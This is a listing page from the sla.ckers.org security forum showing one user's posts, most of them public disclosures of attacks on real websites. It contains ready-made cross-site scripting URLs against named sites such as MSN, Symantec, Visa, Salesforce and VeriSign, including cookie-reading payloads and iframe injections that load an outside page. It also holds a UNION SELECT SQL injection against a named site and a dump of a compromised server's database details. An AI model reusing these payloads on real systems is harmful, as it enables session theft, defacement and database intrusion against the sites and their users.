Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 52
3 years ago
Fugitif
QuoteHost IP: 174.132.167.254 Web Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Powered-by: PHP/5.2.15 DB Server: MySQL >=5 Current User: alsunway_pramit@localhost Sql Version: 5.1.52 Current DB: alsunway_speednet System User: alsunway_pramit@localhost Host Name: gator709.hostgator.com Installation dir: / DB User: 'alsunway_p
Forum: SQL and Code Injection
3 years ago
Fugitif
MSN.COM domain http://auto.fi.msn.com/page.php?page_id=6&td_id=200800024"><script>alert(document.cookie)</script> http://recettes.styledevie.ca.msn.com/forum/message.php?id=244090"><script>alert(String.fromCharCode(88,83,83))</script> http://guide-envies.femmes.fr.msn.com/produit_type.php?id=396&rub=11"><script>alert(document.cookie
Forum: Full Disclosure
3 years ago
Fugitif
Gareth Heyes Wrote: ------------------------------------------------------- > @Fugitif > > Are you on some sort of irony spree? why?
Forum: Full Disclosure
3 years ago
Fugitif
M86 Security - Secure Web Gateway - Internet Security and Email Security http://www.m86security.com/popup.asp?src=/images/diagrams/webmarshal_large.gif&w="><script>alert('XSS')</script>
Forum: Full Disclosure
3 years ago
Fugitif
Hakin9 - IT Security Magazine http://hakin9.org/app/ajax/www/_cms_menu_ajax?page_id=4046&portal_prefix="><script>alert('XSS')</script>
Forum: Full Disclosure
3 years ago
Fugitif
GFI - Web, Email and Network Security solutions http://www.gfi.com/cgi-bin/unsubscribe.asp?id="><script>alert(document.cookie)</script>
Forum: Full Disclosure
3 years ago
Fugitif
VeriSign Securitycenter https://securitycenter.verisign.com/contents_VRSN_US/orderStatusLearnMore.jsp?&product_name="><script>alert('XSS')</script>
Forum: Full Disclosure
3 years ago
Fugitif
Trustwave - ( RBSLynk Trustwave Certificates ) https://rbslynk.trustwave.com/getdur.php?c=10"><script>alert('XSS')</script>
Forum: Full Disclosure
3 years ago
Fugitif
Mashable – The Social Media Guide http://m.mashable.com/search?q="><script>alert(document.cookie)</script> http://www.mashable.com/owa/votes?v=</script>'"><marquee><h1>"><script>alert("XSS")</script></h1></marquee>
Forum: Full Disclosure
3 years ago
Fugitif
Symantec http://www.symantec.com/avcenter/cgi-bin/nisurl.cgi?lang=fr&unblock="><script>alert(String.fromCharCode(88,83,83))</script> http://seer.entsupport.symantec.com/email_forms/site_feedbck.asp?ddProduct="><script>alert(String.fromCharCode(88,83,83))</script>
Forum: Full Disclosure
3 years ago
Fugitif
CRM - Salesforce.com http://www.salesforce.com/customers/?viewType="<marquee><img src=k onerror=alert("XSS") />
Forum: Full Disclosure
3 years ago
Fugitif
CSO Online - Security and Risk XSS http://www.csoonline.com/article/592818/the-hackid-conference-a-kid-friendly-idea-whose-time-has-come?source="><script>alert(String.fromCharCode(88,83,83))</script> SearchSecurity.techtarget.com http://searchsecuritychannel.techtarget.com/googleResults/1,296420,sid97,00.html?query="><script>alert(String.fromCharCode(88,
Forum: Full Disclosure
4 years ago
Fugitif
http://www.xssed.com/news/114/Just_another_persistent_Twitter_XSS/ AND http://xs-sniper.com/blog/2010/07/19/twitter-xss-bug/
Forum: Full Disclosure
4 years ago
Fugitif
SAINT Corporation website vulnerable to Cross-site scripting,html injection and redirect. Check my blog for poc and screenshots. /regards
Forum: Full Disclosure
4 years ago
Fugitif
NitroSecurity http://nitrosecurity.com/reset-password?destination="><script>alert(/XSS/)</script>
Forum: Full Disclosure
4 years ago
Fugitif
LIGATT Security http://www.ligattsecurity.com/about-us/ <- lol http://www.ligattsecurity.com/?s="><script>alert('XSS')</script>
Forum: Full Disclosure
4 years ago
Fugitif
what about http://www.arbornetworks.com/index.php?option=com_performs&formid=91&Itemid=821"><script>alert(String.fromCharCode(88,83,83))</script>
Forum: Full Disclosure
4 years ago
Fugitif
check http://security-sh3ll.blogspot.com/2010/05/tenable-network-security-xss.html for some screenshots and poc
Forum: News and Links
5 years ago
Fugitif
why u don't try blind injection attack?
Forum: SQL and Code Injection
5 years ago
Fugitif
Advanced TOR is a client for OR network and is intended to be an improved alternative for Tor+Vidalia+Privoxy bundle for Windows users. Before trying Advanced TOR, try the original Tor client (https://torproject.org) and read the available documentation to get familiar with Onion Routing and OR Network. You may find Vidalia easier to use. Some of the improvements of Advanced TOR include support
Forum: Projects
5 years ago
Fugitif
Norman xss,iframe http://www.norman.com/support/support_issue_archive/67744/en?msg:utf8:ustring="><script>alert(String.fromCharCode(88,83,83))</script> http://www.norman.com/site_search/en?searchString%3Autf8%3Austring="><iframe src=index.htm http://www.norman.com/support/support_issue_archive/67744/en?msg:utf8:ustring="<IMG src='http://nemesis.t
Forum: Full Disclosure
5 years ago
Fugitif
TwitterCounter.com xss - iframe - redirect http://twittercounter.com/milw0rm?predicted="><script>alert(String.fromCharCode(88,83,83))</script> http://twittercounter.com/milw0rm?predicted="<IMG src='http://nemesis.te-home.net'><BR><BR><IFRAME width='1000%' height='400px' src='http://nemesis.te-home.net'> http://twittercounter.com/trendmicro?
Forum: Full Disclosure
5 years ago
Fugitif
usa.visa.com http://usa.visa.com/cardadvisor/CardAdvisorBusinessSearch?navigation=RESULTS_SUMMARY&QB1=LA&QB2="><script>alert(String.fromCharCode(88,83,83))</script>
Forum: Full Disclosure
5 years ago
Fugitif
hi what about this new xss on myspace.com :) http://www.youtube.com/watch?v=tTkOPxv9L4M more screenshot and poc http://nemesis.te-home.net/News/20090521_Myspace_Critical_XSS_Bugs.html
Forum: Full Disclosure
5 years ago
Fugitif
another xss on paypal and also on ebay http://nemesis.te-home.net/News/20090518_PAYPAL_and_EBAY_still_Vulnerable_to_XSS__.html
Forum: Full Disclosure
5 years ago
Fugitif
source: http://nemesis.te-home.net/News/20090512_PayPal_again_vulnerable_to_XSS_.html
Forum: Full Disclosure
5 years ago
Fugitif
Symantec vs Kaspersky vs Eset-(Nod32) vs AVG vs F-secure vs Trendmicro screen and proof of concept :) http://nemesis.te-home.net/News/20090510_Vulnerabilities_in_Websites_of_6_Antivirus_Vendors.html
Forum: News and Links
5 years ago
Fugitif
we have found also xss vulnerability more info about: http://nemesis.te-home.net/News/20090504_Securitydot_website_Infected_with_Trojan_Downloade.html some screen:
Forum: Full Disclosure
5 years ago
Fugitif
http://www.dehydratedculturemedia.co.in/news.php?news_id=-1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5/* btw, why u ask so many questions about sql injection ? u are a fucking defacer or u search for cc ?
Forum: SQL and Code Injection
5 years ago
Fugitif
QuoteAccording to French blog Nowhere Else, someone has been able to access Twitter administration area, and they&#8217;ve got a bunch of screenshots to prove it. The URL which leads to Twitter&#8217;s admin page is simple enough (and open to everyone): https://admin.twitter.com/admin/&#8220; of course, without a password you cannot get in, and the source does not disclose the natur
Forum: News and Links
Pages: 12Next
Current Page: 1 of 2